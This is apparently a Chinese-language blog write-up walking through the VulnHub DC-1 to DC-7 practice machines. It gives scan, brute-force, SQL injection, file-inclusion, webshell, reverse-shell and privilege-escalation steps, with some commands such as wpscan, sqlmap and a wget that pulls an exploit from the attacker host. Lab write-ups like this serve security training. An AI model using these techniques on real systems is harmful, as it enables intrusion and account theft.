VulnHub DC-1

nmap開(kāi)路獲取信息

http://192.168.106.133 //Drupal CMS

信息收集：

http://192.168.106.133/robots.txt
http://192.168.106.133/MAINTAINERS.txt //可以獲取版本信息

然后用metasploit里面的模塊進(jìn)行攻擊。

獲取數(shù)據(jù)庫(kù)連接信息：

從meterpreter進(jìn)入shell，執(zhí)行python -c 'import pty; pty.spawn("/bin/bash")'實(shí)現(xiàn)完整交互式shell

進(jìn)入數(shù)據(jù)庫(kù)查找admin密碼：select * from users limit 1,1

密碼是被加密的。

嘗試用新密碼特?fù)Q掉舊的密碼。

生成新密碼

利用新的管理員密碼登錄drupal后臺(tái)

發(fā)現(xiàn)flag3：

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

cat /etc/passwd ，發(fā)現(xiàn)存在flag4用戶。

查看/home/flag4/flag4.txt文件

提示要在root下找flag。看來(lái)要提權(quán)啊啊啊啊啊

首先想到的是suid提權(quán)，找一找suid程序把/

發(fā)現(xiàn)/usr/bin/find 具有suid權(quán)限。那么直接用它執(zhí)行命令吧。

取得了最終的flag

Vulnhub DC-2

老規(guī)矩，nmap開(kāi)路

nmap -T4 192.168.106.0/24
發(fā)現(xiàn)目標(biāo)主機(jī)：
192.168.106.134

進(jìn)行更加詳細(xì)的掃描：

sudo nmap -sS -sV -p- -A 192.168.106.134
對(duì)方開(kāi)了80端口 apache2.4.10
7744 ssh OpenSSH 6.7p1

根據(jù)靶機(jī)說(shuō)明，綁定一下域名

訪問(wèn)目標(biāo)網(wǎng)站發(fā)現(xiàn)flag1：

http://dc-2/index.php/flag/

Flag

Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

提示我們需要爆破用戶名和密碼，并建議試用cewl生成字典

底部還有一個(gè)關(guān)鍵信息：Proudly powered by WordPress

所以目標(biāo)站點(diǎn)是wordpress構(gòu)建的。

我們嘗試用 wpscan 枚舉目標(biāo)的用戶名

wpscan --url http://dc-2/ -e u

找到三個(gè)用戶。分別是admin/jerry/tom

用cewl生成密碼

cewl http://dc-2/ -w pass.txt

用wpscan爆破賬號(hào)和密碼：

wpscan -U users.txt ?-P pass.txt --url http://dc-2/

找到兩個(gè)賬號(hào)的密碼：

Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

登錄后臺(tái)，找到第二個(gè)flag：

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

淦，提示用其他方式。

根據(jù)前面的收集的信息，還有一個(gè)ssh端口。

嘗試登陸試試。

發(fā)現(xiàn) ?jerry的密碼登錄不了，。試試tom

可以用tom的密碼登錄，。

tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
提示是一個(gè)rbash。命令受限。

查看flag3.txt的內(nèi)容：

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

提示要切換到j(luò)erry用戶，不過(guò)現(xiàn)在是rbash，要先繞過(guò)rbash才行。然后查看flag4.txt

使用sudo -l查看哪些可以執(zhí)行sudo的命令。

發(fā)現(xiàn)git命令可以且不需要密碼，可以利用它提權(quán)

#

成功獲取到了root權(quán)限和獲取了最終的flag。

VulnHub DC-3

老規(guī)矩，nmap開(kāi)路

掃描目標(biāo)：

信息：開(kāi)放了 80端口

web容器：Apache 2.4.18

目標(biāo)系統(tǒng)：Ubuntu

訪問(wèn)80端口看看

發(fā)現(xiàn)是Joomla網(wǎng)站。使用Joomscan掃描試試

如果沒(méi)有，安裝一下 sudo apt install joomscan

掃描到了版本信息和一些目錄和后臺(tái)管理地址

在exploitdb中嘗試查找一下Joomla 3.7.0的漏洞

找到一個(gè)漏洞信息，是一個(gè)sql注入，并且給出了poc，直接上sqlmap

獲取了數(shù)據(jù)庫(kù)，接著獲取表：

看看#_users表里面信息。

密碼是加密的。嘗試破解一下。就用自帶的 John破解工具試試

john pass.txt
破解出來(lái)密碼是：snoopy

登錄后臺(tái)試試。成功登錄了

在Template里面寫(xiě)一個(gè)shell

用msf生成一個(gè)php webshell，然后寫(xiě)入，訪問(wèn)，獲取會(huì)話

獲取到的權(quán)限是 www-data用戶

查看系統(tǒng)信息：

搜一下系統(tǒng)版本相關(guān)的漏洞

找到一個(gè)和目標(biāo)系統(tǒng)符合的漏洞信息：

是一個(gè)eBPF 本地提權(quán)漏洞
下載利用腳本到目標(biāo)機(jī)
www-data@DC-3:/tmp$ wget http://192.168.106.132:8080/39772.zip

解壓然后利用提權(quán)

提權(quán)成功。

成功獲取到了flag。

DC3總結(jié)：利用Joomla 3.7 SQL注入漏洞，dump后臺(tái)登錄用戶和密碼，在template中寫(xiě)入webshell。連接webshell獲取系統(tǒng)shell，利用Ubuntu 16.04 本地提權(quán)漏洞獲取Root權(quán)限，獲取最終的flag。

VulnHub DC4

nmap開(kāi)路

初步確定，目標(biāo)開(kāi)了22端口和80端口。

訪問(wèn)80端口頁(yè)面，發(fā)現(xiàn)一個(gè)登錄頁(yè)面。

嘗試直接爆破試試。

爆破密碼為 happy

登錄看看

發(fā)現(xiàn)一個(gè)命令執(zhí)行工具。

反彈一個(gè)shell試試吧。

反彈成功。查看權(quán)限發(fā)現(xiàn)是www權(quán)限

發(fā)現(xiàn)jim用戶目錄有一個(gè)密碼備份文件。

嘗試爆破一下jim的密碼：

登錄一下

登錄后提示有一封郵件，查看郵件內(nèi)容。

郵件告訴了我們charles用戶的密碼。

登錄charles用戶試試，?？梢缘卿?/p>

但沒(méi)啥用，沒(méi)啥東西。嘗試提權(quán)。

查找suid程序無(wú)果。

查看sudo 程序

發(fā)現(xiàn)/usr/bin/teehee有sudo權(quán)限，無(wú)需密碼

利用它寫(xiě)入root權(quán)限用戶。

成功獲取了flag。

VulnHub DC5

老規(guī)矩，nmap開(kāi)路

發(fā)現(xiàn)目標(biāo)開(kāi)放了80端口和111端口，其他沒(méi)有什么有用的端口，訪問(wèn)80端口看看

留言頁(yè)面跳轉(zhuǎn)后有一個(gè) thankyou.php的頁(yè)面

刷新，發(fā)現(xiàn)頁(yè)腳的文字發(fā)生了變化。懷疑thankyou.php存在文件包含。，

先用dirb掃一下目錄文件看看

發(fā)現(xiàn)存在footer.php文件，thankyou.php頁(yè)面底部的文字變化可能是包含了footer.php文件

訪問(wèn)一下footer.php文件看看，看到刷新會(huì)變化，證實(shí)了我們的猜想

fuzz一下變量名：

參數(shù)是file

嘗試文件包含 http://192.168.106.137/thankyou.php?file=/etc/passwd

發(fā)現(xiàn)可以成功。

結(jié)合前面的信息 ?nginx/1.6.2 ，可以嘗試包含nginx日志文件獲取webshell

nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log

包含 access.log HTTP/1.1 500 Internal Server Error

包含access.log寫(xiě)入webshell，。連接。

獲得www用戶權(quán)限。

嘗試提權(quán)。

查找具有suid權(quán)限的可執(zhí)行文件

發(fā)現(xiàn)一個(gè) /bin/screen-4.5.0 。

搜一搜漏洞信息

利用本地提權(quán)。上傳利用腳本，然后執(zhí)行提權(quán)。

VulnHub DC-6

nmap掃描

基本信息：開(kāi)放了22端口，80端口，

根據(jù)靶機(jī)描述，綁定一下域名-ip

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:

192.168.106.138 wordy

訪問(wèn)80端口看看 http://wordy/

發(fā)現(xiàn)目標(biāo)是一個(gè) wordpress站點(diǎn)，

嘗試用wpscan掃描看看。

wpscan --url http://wordy/ ?

掃描結(jié)果顯示，沒(méi)什么有用的信息。

嘗試爆破一下登錄信息

wpscan -e u --url http://wordy/
找到一些用戶：
admin
graham
mark
sarah
jens
wpscan --url http://wordy/ -U puser.txt -P /usr/share/wordlists/rockyou.txt //爆破密碼
有個(gè)提示：cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt //簡(jiǎn)化爆破字典
wpscan --url http://wordy/ -U puser.txt -P passwords.txt
找到一個(gè)密碼：mark / helpdesk01

用爆破的密碼登錄目標(biāo)網(wǎng)站后臺(tái)：

看到有個(gè) Activity Monitor插件，眾所周知，wordpress的插件很容易有漏洞。

去搜一搜漏洞信息。找到一個(gè)命令執(zhí)行

嘗試?yán)梅磸梥hell。

反彈成功。

拿到的權(quán)限是www用戶權(quán)限

目標(biāo)信息收集

在 jens用戶下發(fā)現(xiàn)一個(gè) backups.sh腳本

在 mark用戶目錄下發(fā)現(xiàn)一個(gè)文本文件，里面有 graham用戶的密碼。
提示需要切換到 Jens用戶。

用graham登錄一下目標(biāo)

嘗試收集一下 sudo 程序和suid程序信息

suid沒(méi)有什么可利用的。但是 /home/jens/backups.sh 可以以jens用戶執(zhí)行，且不需要密碼。

利用這個(gè)腳本，嘗試獲取 jens用戶的shell。

發(fā)現(xiàn)nmap可以以root用戶運(yùn)行而不需要密碼

可以用nmap提權(quán)。

成功獲取了root權(quán)限。

成功獲取了flag。

VulnHub -DC7

老規(guī)矩，nmap開(kāi)路

開(kāi)放了80端口，22端口。

訪問(wèn)網(wǎng)站看看

目標(biāo)站點(diǎn)是一個(gè) drupal 站點(diǎn)

有一個(gè)版權(quán)信息：@DC7USER

找到一個(gè) github倉(cāng)庫(kù)：https://github.com/Dc7User/staffdb

找到一個(gè)用戶名和密碼。嘗試登陸一下目標(biāo)網(wǎng)站

發(fā)現(xiàn)沒(méi)辦法登錄，試試ssh

登錄成功了。

收集一下信息。任務(wù)計(jì)劃，sudo、suid啥的

發(fā)現(xiàn)一個(gè) /usr/sbin/exim4可能有用，因?yàn)樗谐鲞^(guò)提權(quán)漏洞。

exploitdb搜一下，發(fā)現(xiàn)這個(gè)版本沒(méi)有提權(quán)漏洞。

目錄下一個(gè) backups目錄和一個(gè) mbox文件。

看看mbox文件是什么東西。

發(fā)現(xiàn)一個(gè)root用戶的任務(wù)計(jì)劃，每隔一段時(shí)間，會(huì)執(zhí)行一個(gè)腳本

查看文件權(quán)限發(fā)現(xiàn) www-data 用戶組用戶可以對(duì)它進(jìn)行修改。

查看一下腳本內(nèi)容：

這應(yīng)該就是一個(gè)定時(shí)備份網(wǎng)站的腳本。

這里發(fā)現(xiàn)一個(gè)特別的命令drush

搜一下是干嘛的，

是dupal提供的一個(gè)網(wǎng)站管理的命令。

經(jīng)過(guò)查詢(xún)，發(fā)現(xiàn) drush命令可以更改dupal后臺(tái)的用戶密碼。

嘗試一下。

登錄后臺(tái)試試。

成功登錄。

然后利用php模塊 植入webshell

獲取到了www用戶權(quán)限。

修改 /opt/scripts/backups.sh 文件，反彈shell

等待計(jì)劃任務(wù)執(zhí)行。這一步可能需要最多等15分鐘

成功獲得了root用戶shell

成功獲取了flag。

小運(yùn)營(yíng)瞎玩的 VulnHub靶機(jī)，感興趣可以自己去玩。小運(yùn)營(yíng)也只是在跟公司師傅學(xué)習(xí)之后瞎玩的。

網(wǎng)安需要學(xué)的東西多了，簡(jiǎn)單來(lái)說(shuō)，就是有手就行（狗頭

網(wǎng)絡(luò)安全要學(xué)的東西：https://t.bilibili.com/647133021903781889?tab=2

還沒(méi)上大學(xué)的，先考個(gè)好大學(xué)再說(shuō)?。?！選個(gè)好城市！

好的城市比好的大學(xué)還重要一些。